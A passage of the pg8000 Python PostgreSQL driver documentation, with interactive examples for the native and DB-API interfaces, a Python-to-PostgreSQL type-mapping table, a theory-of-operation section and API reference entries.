\n[]\n>>> con.run(\"COMMIT\")\n[]\n>>> for row in con.run(\"SELECT * FROM book\"):\n... print(row)\n[1, \"Ender's Game\"]\n[2, 'The Magus']\n[3, 'Phineas Finn']\n\n----\n\nrolling back a transaction:\n\n----\n>>> con.run(\"START TRANSACTION\")\n[]\n>>> con.run(\"DELETE FROM book WHERE title = :title\", title=\"Phineas Finn\") \n[]\n>>> con.run(\"ROLLBACK\")\n[]\n>>> for row in con.run(\"SELECT * FROM book\"):\n... print(row)\n[1, \"Ender's Game\"]\n[2, 'The Magus']\n[3, 'Phineas Finn']\n\n----\n\n\n=== Query Using Fuctions\n\nAnother query, using some PostgreSQL functions:\n\n[source,python]\n----\n>>> con.run(\"SELECT extract(millennium from now())\")\n[[3.0]]\n\n----\n\n\n=== Interval Type\n\nA query that returns the PostgreSQL interval type:\n\n[source,python]\n----\n>>> import datetime\n>>>\n>>> ts = datetime.date(1980, 4, 27)\n>>> con.run(\"SELECT timestamp '2013-12-01 16:06' - :ts\", ts=ts)\n[[datetime.timedelta(days=12271, seconds=57960)]]\n\n----\n\n\n=== Point Type\n\nA round-trip with a\nhttps:\/\/www.postgresql.org\/docs\/current\/datatype-geometric.html[PostgreSQL\npoint] type:\n\n[source,python]\n----\n>>> con.run(\"SELECT CAST(:pt as point)\", pt='(2.3,1)')\n[['(2.3,1)']]\n\n----\n\n\n=== Client Encoding\n\nWhen communicating with the server, pg8000 uses the character set that the\nserver asks it to use (the client encoding). By default the client encoding is\nthe database's character set (chosen when the database is created), but the\nclient encoding can be changed in a number of ways (eg. setting\nCLIENT_ENCODING in postgresql.conf). Another way of changing the client\nencoding is by using an SQL command. For example:\n\n[source,python]\n----\n>>> con.run(\"SET CLIENT_ENCODING TO 'UTF8'\")\n[]\n>>> con.run(\"SHOW CLIENT_ENCODING\")\n[['UTF8']]\n\n----\n\n\n=== JSON\n\nhttps:\/\/www.postgresql.org\/docs\/current\/datatype-json.html[JSON] always comes\nback from the server de-serialized. If the JSON you want to send is a `dict`\nthen you can just do:\n\n[source,python]\n----\n>>> val = {'name': 'Apollo 11 Cave', 'zebra': True, 'age': 26.003}\n>>> con.run(\"SELECT :apollo\", apollo=val)\n[[{'age': 26.003, 'name': 'Apollo 11 Cave', 'zebra': True}]]\n\n----\n\nJSON can always be sent in serialized form to the server:\n\n[source,python]\n----\n>>> import json\n>>>\n>>> val = ['Apollo 11 Cave', True, 26.003]\n>>> con.run(\"SELECT CAST(:apollo as jsonb)\", apollo=json.dumps(val))\n[[['Apollo 11 Cave', True, 26.003]]]\n\n----\n\n\n=== Retrieve Column Metadata From Results\n\nFind the column metadata returned from a query:\n\n[source,python]\n----\n>>> con.run(\"create temporary table quark (id serial, name text)\")\n[]\n>>> for name in ('Up', 'Down'):\n... con.run(\"INSERT INTO quark (name) VALUES (:name)\", name=name)\n[]\n[]\n>>> # Now execute the query\n>>>\n>>> con.run(\"SELECT * FROM quark\")\n[[1, 'Up'], [2, 'Down']]\n>>>\n>>> # and retried the metadata\n>>>\n>>> con.columns\n[{'table_oid': ..., 'column_attrnum': 1, 'type_oid': 23, 'type_size': 4, 'type_modifier': -1, 'format': 0, 'name': 'id'}, {'table_oid': ..., 'column_attrnum': 2, 'type_oid': 25, 'type_size': -1, 'type_modifier': -1, 'format': 0, 'name': 'name'}]\n>>>\n>>> # Show just the column names\n>>>\n>>> [c['name'] for c in con.columns]\n['id', 'name']\n\n----\n\n\n=== Notices And Notifications\n\nPostgreSQL https:\/\/www.postgresql.org\/docs\/current\/static\/plpgsql-errors-and-messages.html[notices]\nare stored in a deque called `Connection.notices` and added using the\n`append()` method. Similarly there are `Connection.notifications` for\nhttps:\/\/www.postgresql.org\/docs\/current\/static\/sql-notify.html[notifications]\nand `Connection.parameter_statuses` for changes to the server configuration.\nHere's an example:\n\n[source,python]\n----\n>>> con.run(\"LISTEN aliens_landed\")\n[]\n>>> con.run(\"NOTIFY aliens_landed\")\n[]\n>>> # A notification is a tuple containing (backend_pid, channel, payload)\n>>>\n>>> con.notifications[0]\n(..., 'aliens_landed', '')\n\n----\n\n\n=== LIMIT ALL\n\nYou might think that the following would work, but in fact it fails:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' LIMIT :lim\", lim='ALL')\nTraceback (most recent call last):\npg8000.exceptions.DatabaseError: ...\n\n----\n\nInstead the https:\/\/www.postgresql.org\/docs\/current\/sql-select.html[docs say]\nthat you can send `null` as an alternative to `ALL`, which does work:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' LIMIT :lim\", lim=None)\n[['silo 1']]\n\n----\n\n\n=== IN and NOT IN\n\nYou might think that the following would work, but in fact the server doesn't\nlike it:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' WHERE 'a' IN :v\", v=('a', 'b'))\nTraceback (most recent call last):\npg8000.exceptions.DatabaseError: ...\n\n----\n\ninstead you can write it using the\nhttps:\/\/www.postgresql.org\/docs\/current\/functions-array.html[`unnest`]\nfunction:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' WHERE 'a' IN (SELECT unnest(:v))\", v=('a', 'b'))\n[['silo 1']]\n\n----\n\nand you can do the same for `NOT IN`.\n\n\n=== Many SQL Statements Can't Be Parameterized\n\nIn PostgreSQL parameters can only be used for\nhttps:\/\/www.postgresql.org\/docs\/current\/xfunc-sql.html#XFUNC-SQL-FUNCTION-ARGUMENTS[data values, not identifiers]. Sometimes this might not work as expected,\nfor example the following fails:\n\n[source,python]\n----\n>>> con.run(\"CREATE USER juan WITH PASSWORD :password\", password='quail')\nTraceback (most recent call last):\npg8000.exceptions.DatabaseError: ...\n\n----\n\nIt fails because the PostgreSQL server doesn't allow this statement to have\nany parameters. There are many SQL statements that one might think would have\nparameters, but don't.\n\n\n=== COPY from and to a file\n\nThe SQL https:\/\/www.postgresql.org\/docs\/current\/sql-copy.html[COPY] statement\ncan be used to copy from and to a file or file-like object. Here' an example\nusing the CSV format:\n\n[source,python]\n----\n\n>>> from io import BytesIO\n>>> import csv\n>>> import codecs\n>>>\n>>> # Create a CSV file in memory\n>>>\n>>> stream_in = BytesIO()\n>>> StreamWriter = codecs.getwriter('utf-8')\n>>> csv_writer = csv.writer(StreamWriter(stream_in))\n>>> csv_writer.writerow([1, \"electron\"])\n>>> csv_writer.writerow([2, \"muon\"])\n>>> csv_writer.writerow([3, \"tau\"])\n>>> stream_in.seek(0)\n0\n>>>\n>>> # Create a table and then copy the CSV into it\n>>>\n>>> con.run(\"CREATE TEMPORARY TABLE lepton (id SERIAL, name TEXT)\")\n[]\n>>> con.run(\"COPY lepton FROM STDIN WITH (FORMAT CSV)\", stream=stream_in)\n[]\n>>>\n>>> # COPY from a table to a stream\n>>>\n>>> stream_out = BytesIO()\n>>> con.run(\"COPY lepton TO STDOUT WITH (FORMAT CSV)\", stream=stream_out)\n[]\n>>> stream_out.seek(0)\n0\n>>> StreamReader = codecs.getreader('utf-8')\n>>> for row in csv.reader(StreamReader(stream_out)):\n... print(row)\n['1', 'electron']\n['2', 'muon']\n['3', 'tau']\n\n----\n\n\n=== Execute Multiple SQL Statements\n\nIf you want to execute a series of SQL statements (eg. an `.sql` file), you\ncan run them as expected:\n\n[source,python]\n----\n\n>>> statements = \"SELECT 5; SELECT 'Erich Fromm';\"\n>>>\n>>> con.run(statements)\n[[5], ['Erich Fromm']]\n\n----\n\nThe only caveat is that when executing multiple statements you can't have any\nparameters.\n\n\n=== Quoted Identifiers in SQL\n\nSay you had a column called `My Column`. Since it's case sensitive and\ncontains a space, you'd have to\nhttps:\/\/www.postgresql.org\/docs\/current\/sql-syntax-lexical.html#SQL-SYNTAX-IDENTIFIERSdouble[surround it by double quotes]. But you can't do:\n\n[source,python]\n----\n>>> con.run(\"select 'hello' as \"My Column\"\")\nTraceback (most recent call last):\nSyntaxError: invalid syntax\n\n----\n\nsince Python uses double quotes to delimit string literals, so one solution is\nto use Python's\nhttps:\/\/docs.python.org\/3\/tutorial\/introduction.html#strings[triple quotes]\nto delimit the string instead:\n\n[source,python]\n----\n>>> con.run('''select 'hello' as \"My Column\"''')\n[['hello']]\n\n----\n\n\n=== Custom adapter from a Python type to a PostgreSQL type\n\npg8000 has a mapping from Python types to PostgreSQL types for when it needs\nto send SQL parameters to the server. The default mapping that comes with\npg8000 is designed to work well in most cases, but you might want to add or\nreplace the default mapping.\n\nA Python `datetime.timedelta` object is sent to the server as a PostgreSQL\n`interval` type, which has the `oid` 1186. But let's say we wanted to create\nour own Python class to be sent as an `interval` type. Then we'd have to\nregister an adapter:\n\n[source,python]\n----\n\n>>> class MyInterval(str):\n... pass\n>>>\n>>> def my_interval_out(my_interval):\n... return my_interval # Must return a str\n>>>\n>>> con.register_out_adapter(MyInterval, 1186, my_interval_out)\n>>> con.run(\"SELECT :interval\", interval=MyInterval(\"2 hours\"))\n[[datetime.timedelta(seconds=7200)]]\n\n----\n\nNote that it still came back as a `datetime.timedelta` object because we only\nchanged the mapping from Python to PostgreSQL. See below for an example of how\nto change the mapping from PostgreSQL to Python.\n\n\n=== Custom adapter from a PostgreSQL type to a Python type\n\npg8000 has a mapping from PostgreSQL types to Python types for when it receives\nSQL results from the server. The default mapping that comes with pg8000 is\ndesigned to work well in most cases, but you might want to add or replace the\ndefault mapping.\n\nIf pg800 recieves PostgreSQL `interval` type, which has the `oid` 1186, it\nconverts it into a Python `datetime.timedelta` object. But let's say we wanted\nto create our own Python class to be used instead of `datetime.timedelta`. Then\nwe'd have to register an adapter:\n\n\n[source,python]\n----\n\n>>> class MyInterval(str):\n... pass\n>>>\n>>> def my_interval_in(my_interval_str): # The parameter is of type str\n... return MyInterval(my_interval)\n>>>\n>>> con.register_in_adapter(1186, my_interval_in)\n>>> con.run(\"SELECT \\'2 years'\")\n[['2 years']]\n\n----\n\nNote that registering the 'in' adapter only afects the mapping from the\nPostgreSQL type to the Python type. See above for an example of how to change\nthe mapping from PostgreSQL to Python.\n\n\n=== Could Not Determine Data Type Of Parameter\n\nSometimes you'll get the 'could not determine data type of parameter' error\nmessage from the server:\n\n[source,python]\n----\n\n>>> con.run(\"SELECT :v IS NULL\", v=None)\nTraceback (most recent call last):\npg8000.exceptions.DatabaseError: {'S': 'ERROR', 'V': 'ERROR', 'C': '42P18', 'M': 'could not determine data type of parameter $1', 'F': 'postgres.c', 'L': '...', 'R': 'exec_parse_message'}\n\n----\n\nOne way of solving it is to put a `cast` in the SQL:\n\n[source,python]\n----\n\n>>> con.run(\"SELECT cast(:v as TIMESTAMP) IS NULL\", v=None)\n[[True]]\n\n----\n\nAnother way is to override the type that pg8000 sends along with each\nparameter:\n\n[source,python]\n----\n\n>>> con.run(\"SELECT :v IS NULL\", v=None, types={'v': pg8000.native.TIMESTAMP})\n[[True]]\n\n----\n\n\n=== Prepared Statements\n\nhttps:\/\/www.postgresql.org\/docs\/current\/sql-prepare.html[Prepared statements]\ncan be useful in improving performance when you have a statement that's\nexecuted repeatedly. Here's an example:\n\n\n[source,python]\n----\n\n>>> # Create the prepared statement\n>>> ps = con.prepare(\"SELECT cast(:v as varchar)\")\n>>>\n>>> # Exceute the statement repeatedly\n>>> ps.run(v=\"speedy\")\n[['speedy']]\n>>> ps.run(v=\"rapid\")\n[['rapid']]\n>>> ps.run(v=\"swift\")\n[['swift']]\n>>>\n>>> # Close the prepared statement, releasing resources on the server\n>>> ps.close()\n\n----\n\n\n=== Use Environment Variables As Connection Defaults\n\nYou might want to use the current user as the database username for example:\n\n[source,python]\n----\n\n>>> import pg8000\n>>> import getpass\n>>>\n>>> # Connect to the database with current user name\n>>> username = getpass.getuser()\n>>> connection = pg8000.native.Connection(username, password=\"cpsnow\")\n>>>\n>>> connection.run(\"SELECT 'pilau'\")\n[['pilau']]\n\n----\n\nor perhaps you may want to use some of the same\nhttps:\/\/www.postgresql.org\/docs\/current\/libpq-envars.html[environment variables\nthat libpq uses]:\n\n[source,python]\n----\n\n>>> import pg8000\n>>> from os import environ\n>>>\n>>> username = environ.get('PGUSER', 'postgres')\n>>> password = environ.get('PGPASSWORD', 'cpsnow')\n>>> host = environ.get('PGHOST', 'localhost')\n>>> port = environ.get('PGPORT', '5432')\n>>> database = environ.get('PGDATABASE')\n>>>\n>>> connection = pg8000.native.Connection(\n... username, password=password, host=host, port=port, database=database)\n>>>\n>>> connection.run(\"SELECT 'Mr Cairo'\")\n[['Mr Cairo']]\n\n----\n\nIt might be asked, why doesn't pg8000 have this behaviour built in? The\nthinking follows the second aphorism of\nhttps:\/\/www.python.org\/dev\/peps\/pep-0020\/[The Zen of Python]:\n\n[quote]\nExplicit is better than implicit.\n\nSo we've taken the approach of only being able to set connection parameters\nusing the `pg8000.native.Connection()` constructor.\n\n\n=== Connect To PostgreSQL Over SSL\n\nTo connect to the server using SSL defaults do:\n\n[source,python]\n----\n\nimport pg8000.native\n\n\nconnection = pg8000.native.Connection(\n username, password=\"cpsnow\", ssl_context=True)\nconnection.run(\"SELECT 'The game is afoot!'\")\n\n----\n\nTo connect over SSL with custom settings, set the `ssl_context` parameter to\nan https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\nobject:\n\n[source,python]\n----\n\nimport pg8000.native\nimport ssl\n\n\nssl_context = ssl.SSLContext()\nssl_context.verify_mode = ssl.CERT_REQUIRED\nssl_context.load_verify_locations('root.pem') \nconnection = pg8000.native.Connection(\n username, password=\"cpsnow\", ssl_context=ssl_context)\n\n----\n\nIt may be that your PostgreSQL server is behind an SSL proxy server in which\ncase you can set a pg8000-specific attribute\n`ssl.SSLContext.request_ssl = False` which tells pg8000 to connect using an\nSSL socket, but not to request SSL from the PostgreSQL server:\n\n[source,python]\n----\n\nimport pg8000.native\nimport ssl\n\n\nssl_context = ssl.SSLContext()\nssl_context.request_ssl = False\nconnection = pg8000.native.Connection(\n username, password=\"cpsnow\", ssl_context=ssl_context)\n\n----\n\n\n== DB-API 2 Interactive Examples\n\nThese examples stick to the DB-API 2.0 standard.\n\n\n=== Basic Example\n\nImport pg8000, connect to the database, create a table, add some rows and then\nquery the table:\n\n[source,python]\n----\n>>> import pg8000\n>>>\n>>> conn = pg8000.dbapi.connect(user=\"postgres\", password=\"cpsnow\")\n>>> cursor = conn.cursor()\n>>> cursor.execute(\"CREATE TEMPORARY TABLE book (id SERIAL, title TEXT)\")\n>>> cursor.execute(\n... \"INSERT INTO book (title) VALUES (%s), (%s) RETURNING id, title\",\n... (\"Ender's Game\", \"Speaker for the Dead\"))\n>>> results = cursor.fetchall()\n>>> for row in results:\n... id, title = row\n... print(\"id = %s, title = %s\" % (id, title))\nid = 1, title = Ender's Game\nid = 2, title = Speaker for the Dead\n>>> conn.commit()\n\n----\n\n\n=== Query Using Fuctions\n\nAnother query, using some PostgreSQL functions:\n\n[source,python]\n----\n>>> cursor.execute(\"SELECT extract(millennium from now())\")\n>>> cursor.fetchone()\n[3.0]\n\n----\n\n\n=== Interval Type\n\nA query that returns the PostgreSQL interval type:\n\n[source,python]\n----\n>>> import datetime\n>>> cursor.execute(\"SELECT timestamp '2013-12-01 16:06' - %s\",\n... (datetime.date(1980, 4, 27),))\n>>> cursor.fetchone()\n[datetime.timedelta(days=12271, seconds=57960)]\n\n----\n\n\n=== Point Type\n\nA round-trip with a\nhttps:\/\/www.postgresql.org\/docs\/current\/datatype-geometric.html[PostgreSQL\npoint] type:\n\n[source,python]\n----\n>>> cursor.execute(\"SELECT cast(%s as point)\", ('(2.3,1)',))\n>>> cursor.fetchone()\n['(2.3,1)']\n\n----\n\n\n=== Numeric Parameter Style\n\npg8000 supports all the DB-API parameter styles. Here's an example of using\nthe 'numeric' parameter style:\n\n[source,python]\n----\n>>> pg8000.dbapi.paramstyle = \"numeric\"\n>>> cursor = conn.cursor()\n>>> cursor.execute(\"SELECT array_prepend(:1, :2)\", ( 500, [1, 2, 3, 4], ))\n>>> cursor.fetchone()\n[[500, 1, 2, 3, 4]]\n>>> pg8000.dbapi.paramstyle = \"format\"\n>>> conn.rollback()\n\n----\n\n\n=== Autocommit\n\nFollowing the DB-API specification, autocommit is off by default. It can be\nturned on by using the autocommit property of the connection.\n\n[source,python]\n----\n>>> conn.autocommit = True\n>>> cur = conn.cursor()\n>>> cur.execute(\"vacuum\")\n>>> conn.autocommit = False\n>>> cur.close()\n\n----\n\n\n=== Client Encoding\n\nWhen communicating with the server, pg8000 uses the character set that the\nserver asks it to use (the client encoding). By default the client encoding is\nthe database's character set (chosen when the database is created), but the\nclient encoding can be changed in a number of ways (eg. setting\nCLIENT_ENCODING in postgresql.conf). Another way of changing the client\nencoding is by using an SQL command. For example:\n\n[source,python]\n----\n>>> cur = conn.cursor()\n>>> cur.execute(\"SET CLIENT_ENCODING TO 'UTF8'\")\n>>> cur.execute(\"SHOW CLIENT_ENCODING\")\n>>> cur.fetchone()\n['UTF8']\n>>> cur.close()\n\n----\n\n\n=== JSON\n\nJSON is sent to the server serialized, and returned de-serialized. Here's an\nexample:\n\n[source,python]\n----\n>>> import json\n>>> cur = conn.cursor()\n>>> val = ['Apollo 11 Cave', True, 26.003]\n>>> cur.execute(\"SELECT cast(%s as json)\", (json.dumps(val),))\n>>> cur.fetchone()\n[['Apollo 11 Cave', True, 26.003]]\n>>> cur.close()\n\n----\n\n\n=== Retrieve Column Names From Results\n\nUse the columns names retrieved from a query:\n\n[source,python]\n----\n>>> import pg8000\n>>> conn = pg8000.dbapi.connect(user=\"postgres\", password=\"cpsnow\")\n>>> c = conn.cursor()\n>>> c.execute(\"create temporary table quark (id serial, name text)\")\n>>> c.executemany(\"INSERT INTO quark (name) VALUES (%s)\", ((\"Up\",), (\"Down\",)))\n>>> #\n>>> # Now retrieve the results\n>>> #\n>>> c.execute(\"select * from quark\")\n>>> rows = c.fetchall()\n>>> keys = [k[0] for k in c.description]\n>>> results = [dict(zip(keys, row)) for row in rows]\n>>> assert results == [{'id': 1, 'name': 'Up'}, {'id': 2, 'name': 'Down'}]\n\n----\n\n\n=== Notices\n\nPostgreSQL https:\/\/www.postgresql.org\/docs\/current\/static\/plpgsql-errors-and-messages.html[notices]\nare stored in a deque called `Connection.notices` and added using the\n`append()` method. Similarly there are `Connection.notifications` for\nhttps:\/\/www.postgresql.org\/docs\/current\/static\/sql-notify.html[notifications]\nand `Connection.parameter_statuses` for changes to the server configuration.\nHere's an example:\n\n[source,python]\n----\n>>> cur = conn.cursor()\n>>> cur.execute(\"LISTEN aliens_landed\")\n>>> cur.execute(\"NOTIFY aliens_landed\")\n>>> conn.commit()\n>>> conn.notifications[0][1]\n'aliens_landed'\n\n----\n\n\n=== COPY from and to a file\n\nThe SQL https:\/\/www.postgresql.org\/docs\/current\/sql-copy.html[COPY] statement\ncan be used to copy from and to a file or file-like object:\n\n[source,python]\n----\n\n>>> from io import BytesIO\n>>> #\n>>> # COPY from a stream to a table\n>>> #\n>>> stream_in = BytesIO(b'1\\telectron\\n2\\tmuon\\n3\\ttau\\n')\n>>> cur = conn.cursor()\n>>> cur.execute(\"create temporary table lepton (id serial, name text)\")\n>>> cur.execute(\"COPY lepton FROM stdin\", stream=stream_in)\n>>> #\n>>> # Now COPY from a table to a stream\n>>> #\n>>> stream_out = BytesIO()\n>>> cur.execute(\"copy lepton to stdout\", stream=stream_out)\n>>> stream_out.getvalue()\nb'1\\telectron\\n2\\tmuon\\n3\\ttau\\n'\n\n----\n\n\n== Type Mapping\n\nThe following table shows the default mapping between Python types and\nPostgreSQL types, and vice versa.\n\nIf pg8000 doesn't recognize a type that it receives from PostgreSQL, it will\nreturn it as a `str` type. This is how pg8000 handles PostgreSQL `enum` and\nXML types. It's possible to change the default mapping using adapters (see the\nexamples).\n\n.Python to PostgreSQL Type Mapping\n|===\n| Python Type | PostgreSQL Type | Notes\n\n| bool\n| bool\n|\n\n| int\n| int4\n|\n\n| str\n| text\n|\n\n| float\n| float8\n|\n\n| decimal.Decimal\n| numeric\n|\n\n| bytes\n| bytea\n|\n\n| datetime.datetime (without tzinfo)\n| timestamp without timezone\n| See note below.\n\n| datetime.datetime (with tzinfo)\n| timestamp with timezone\n| See note below.\n\n| datetime.date\n| date\n| See note below.\n\n| datetime.time\n| time without time zone\n|\n\n| datetime.timedelta\n| interval\n|\n\n| None\n| NULL\n|\n\n| uuid.UUID\n| uuid\n|\n\n| ipaddress.IPv4Address\n| inet\n|\n\n| ipaddress.IPv6Address\n| inet\n|\n\n| ipaddress.IPv4Network\n| inet\n|\n\n| ipaddress.IPv6Network\n| inet\n|\n\n| int\n| xid\n|\n\n| list of int\n| INT4[]\n|\n\n| list of float\n| FLOAT8[]\n|\n\n| list of bool\n| BOOL[]\n|\n\n| list of str\n| TEXT[]\n|\n\n| int\n| int2vector\n| Only from PostgreSQL to Python\n\n| JSON\n| json, jsonb\n| The Python JSON is provided as a Python serialized string. Results returned\n as de-serialized JSON.\n|===\n\n\n[[_theory_of_operation]]\n== Theory Of Operation\n\n{empty} +\n\n[quote, Jochen Liedtke, Liedtke's minimality principle]\n____\nA concept is tolerated inside the microkernel only if moving it outside the\nkernel, i.e., permitting competing implementations, would prevent the\nimplementation of the system's required functionality.\n____\n\n\npg8000 is designed to be used with one thread per connection.\n\nPg8000 communicates with the database using the\nhttp:\/\/www.postgresql.org\/docs\/current\/static\/protocol.html[PostgreSQL\nFrontend\/Backend Protocol] (FEBE). By default, pg8000 uses unnamed prepared\nstatements. It uses the Extended Query feature of the FEBE. So the steps are:\n\n. Query comes in.\n. Send a PARSE message to the server to create an unnamed prepared statement.\n. Send a BIND message to run against the unnamed prepared statement, resulting\n in an unnamed portal on the server.\n. Send an EXECUTE message to read all the results from the portal.\n\nIt's also possible to use named prepared statements. In which case the\nprepared statement persists on the server, and represented in pg8000 using a\nPreparedStatement object. This means that the PARSE step gets executed once up\nfront, and then only the BIND and EXECUTE steps are repeated subsequently.\n\nThere are a lot of PostgreSQL data types, but few primitive data types in\nPython. A PostgreSQL data type has to be assigned to each query parameter,\nwhich is impossible to work out in all cases. In these cases an adapter can be\nused for the parameter to indicate its type, or sometimes an\nhttps:\/\/www.postgresql.org\/docs\/current\/static\/sql-expressions.html#SQL-SYNTAX-TYPE-CASTS[explicit cast] can be used in the SQL.\n\nIn the FEBE protocol, each query parameter can be sent to the server either as\nbinary or text according to the format code. In pg8000 the parameters are\nalways sent as text.\n\n* PostgreSQL has +\/-infinity values for dates and timestamps, but Python does\n not. Pg8000 handles this by returning +\/-infinity strings in results, and in\n parameters the strings +\/- infinity can be used.\n\n* PostgreSQL dates\/timestamps can have values outside the range of Python\n datetimes. These are handled using the underlying PostgreSQL storage method.\n I don't know of any users of pg8000 that use this feature, so get in touch if\n it affects you.\n\n* Occasionally, the network connection between pg8000 and the server may go\n down. If pg8000 encounters a network problem it'll raise an `InterfaceError`\n with an error message starting with `network error` and with the original\n exception set as the\n https:\/\/docs.python.org\/3\/reference\/simple_stmts.html#the-raise-statement[cause].\n\n\n== Native API Docs\n\n=== pg8000.native.Connection(user, host='localhost', database=None, port=5432, password=None, source_address=None, unix_sock=None, ssl_context=None, timeout=None, tcp_keepalive=True, application_name=None, replication=None)\n\nCreates a connection to a PostgreSQL database.\n\nuser::\n The username to connect to the PostgreSQL server with. If your server\n character encoding is not `ascii` or `utf8`, then you need to provide\n `user` as bytes, eg. `'my_name'.encode('EUC-JP')`.\n\nhost::\n The hostname of the PostgreSQL server to connect with. Providing this\n parameter is necessary for TCP\/IP connections. One of either `host` or\n `unix_sock` must be provided. The default is `localhost`.\n\ndatabase::\n The name of the database instance to connect with. If `None` then the\n PostgreSQL server will assume the database name is the same as the username.\n If your server character encoding is not `ascii` or `utf8`, then you need to\n provide `database` as bytes, eg. `'my_db'.encode('EUC-JP')`.\n\nport::\n The TCP\/IP port of the PostgreSQL server instance. This parameter defaults\n to `5432`, the registered common port of PostgreSQL TCP\/IP servers.\n\npassword::\n The user password to connect to the server with. This parameter is optional;\n if omitted and the database server requests password-based authentication,\n the connection will fail to open. If this parameter is provided but not\n requested by the server, no error will occur. +\n +\n If your server character encoding is not `ascii` or `utf8`, then\n you need to provide `password` as bytes, eg.\n `'my_password'.encode('EUC-JP')`.\n\n\nsource_address::\n The source IP address which initiates the connection to the PostgreSQL server.\n The default is `None` which means that the operating system will choose the\n source address.\n\nunix_sock::\n The path to the UNIX socket to access the database through, for example,\n `'\/tmp\/.s.PGSQL.5432'`. One of either `host` or `unix_sock` must be provided.\n\nssl_context::\n This governs SSL encryption for TCP\/IP sockets. It can have three values:\n * `None`, meaning no SSL (the default)\n * `True`, means use SSL with an\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\n created using\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.create_default_context[`ssl.create_default_context()`]\n * An instance of\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\n which will be used to create the SSL connection. +\n +\n If your PostgreSQL server is behind an SSL proxy, you can set the\n pg8000-specific attribute `ssl.SSLContext.request_ssl = False`, which\n tells pg8000 to use an SSL socket, but not to request SSL from the\n PostgreSQL server. Note that this means you can't use SCRAM\n authentication with channel binding.\n\ntimeout::\n This is the time in seconds before the connection to the server will time\n out. The default is `None` which means no timeout.\n\ntcp_keepalive::\n If `True` then use\n https:\/\/en.wikipedia.org\/wiki\/Keepalive#TCP_keepalive[TCP keepalive]. The\n default is `True`.\n\napplication_name::\n Sets the https:\/\/www.postgresql.org\/docs\/current\/runtime-config-logging.html#GUC-APPLICATION-NAME[application_name]. If your server character encoding is not\n `ascii` or `utf8`, then you need to provide values as bytes, eg.\n `'my_application_name'.encode('EUC-JP')`. The default is `None` which means\n that the server will set the application name.\n\nreplication::\n Used to run in https:\/\/www.postgresql.org\/docs\/12\/protocol-replication.html[streaming replication mode].\n If your server character encoding is not `ascii` or `utf8`, then you need to\n provide values as bytes, eg. `'database'.encode('EUC-JP')`.\n\n\n=== pg8000.native.Error\n\nGeneric exception that is the base exception of the other error exceptions.\n\n\n=== pg8000.native.InterfaceError\n\nFor errors that originate within pg8000.\n\n\n=== pg8000.native.DatabaseError\n\nFor errors that originate from the server.\n\n=== pg8000.native.Connection.notifications\n\nA deque of server-side\nhttps:\/\/www.postgresql.org\/docs\/current\/sql-notify.html[notifications] received\nby this database connection (via the LISTEN \/ NOTIFY PostgreSQL commands). Each\nlist item is a three-element tuple containing the PostgreSQL backend PID that\nissued the notify, the channel and the payload.\n\n\n=== pg8000.native.Connection.notices\n\nA deque of server-side notices received by this database connection.\n\n\n=== pg8000.native.Connection.parameter_statuses\n\nA deque of server-side parameter statuses received by this database connection.\n\n\n=== pg8000.native.Connection.run(sql, stream=None, types=None, **kwargs)\n\nExecutes an sql statement, and returns the results as a `list`. For example:\n\n`con.run(\"SELECT * FROM cities where population > :pop\", pop=10000)`\n\nsql::\n The SQL statement to execute. Parameter placeholders appear as a `:` followed\n by the parameter name.\n\nstream::\n For use with the PostgreSQL\nhttp:\/\/www.postgresql.org\/docs\/current\/static\/sql-copy.html[COPY] command. For\na `COPY FROM` the parameter must be a readable file-like object, and for\n`COPY TO` it must be writable.\n\ntypes::\n A dictionary of oids. A key corresponds to a parameter. \n\nkwargs::\n The parameters of the SQL statement.\n\n\n=== pg8000.native.Connection.row_count\n\nThis read-only attribute contains the number of rows that the last `run()`\nmethod produced (for query statements like `SELECT`) or affected (for\nmodification statements like `UPDATE`.\n\nThe value is -1 if:\n\n* No `run()` method has been performed yet.\n* There was no rowcount associated with the last `run()`.\n* Using a `SELECT` query statement on a PostgreSQL server older than version\n 9.\n* Using a `COPY` query statement on PostgreSQL server version 8.1 or older.\n\n\n=== pg8000.native.Connection.columns\n\nA list of column metadata. Each item in the list is a dictionary with the\nfollowing keys:\n\n* name\n* table_oid\n* column_attrnum\n* type_oid\n* type_size\n* type_modifier\n* format\n\n\n=== pg8000.native.Connection.close()\n\nCloses the database connection.\n\n\n=== pg8000.native.Connection.register_out_adapter(typ, oid, out_func)\n\nRegister a type adapter for types going out from pg8000 to the server.\n\ntyp::\n The Python class that the adapter is for.\n\noid::\n The PostgreSQL type identifier found in the\n https:\/\/www.postgresql.org\/docs\/current\/catalog-pg-type.html[pg_type system\n calalog].\n\nout_func::\n A function that takes the Python object and returns its string representation\n in the format that the server requires.\n\n\n=== pg8000.native.Connection.register_in_adapter(oid, in_func)\n\nRegister a type adapter for types coming in from the server to pg8000.\n\noid::\n The PostgreSQL type identifier found in the\n https:\/\/www.postgresql.org\/docs\/current\/catalog-pg-type.html[pg_type system\n calalog].\n\nin_func::\n A function that takes the PostgreSQL string representation and returns\n a corresponding Python object.\n\n\n=== pg8000.native.Connection.prepare(sql)\n\nReturns a PreparedStatement object which represents a\nhttps:\/\/www.postgresql.org\/docs\/current\/sql-prepare.html[prepared statement] on\nthe server. It can subsequently be repeatedly executed as shown in the\n<<_prepared_statements, example>>.\n\nsql::\n The SQL statement to prepare. Parameter placeholders appear as a `:` followed\n by the parameter name.\n\n\n=== pg8000.native.PreparedStatement\n\nA prepared statement object is returned by the\n`pg8000.native.Connection.prepare()` method of a connection. It has the\nfollowing methods:\n\n\n=== pg8000.native.PreparedStatement.run(**kwargs)\n\nExecutes the prepared statement, and returns the results as a `tuple`.\n\nkwargs::\n The parameters of the prepared statement.\n\n\n=== pg8000.native.PreparedStatement.close()\n\nCloses the prepared statement, releasing the prepared statement held on the\nserver.\n\n\n== DB-API 2 Docs\n\n\n=== Properties\n\n\n==== pg8000.dbapi.apilevel\n\nThe DBAPI level supported, currently \"2.0\".\n\nThis property is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.threadsafety\n\nInteger constant stating the level of 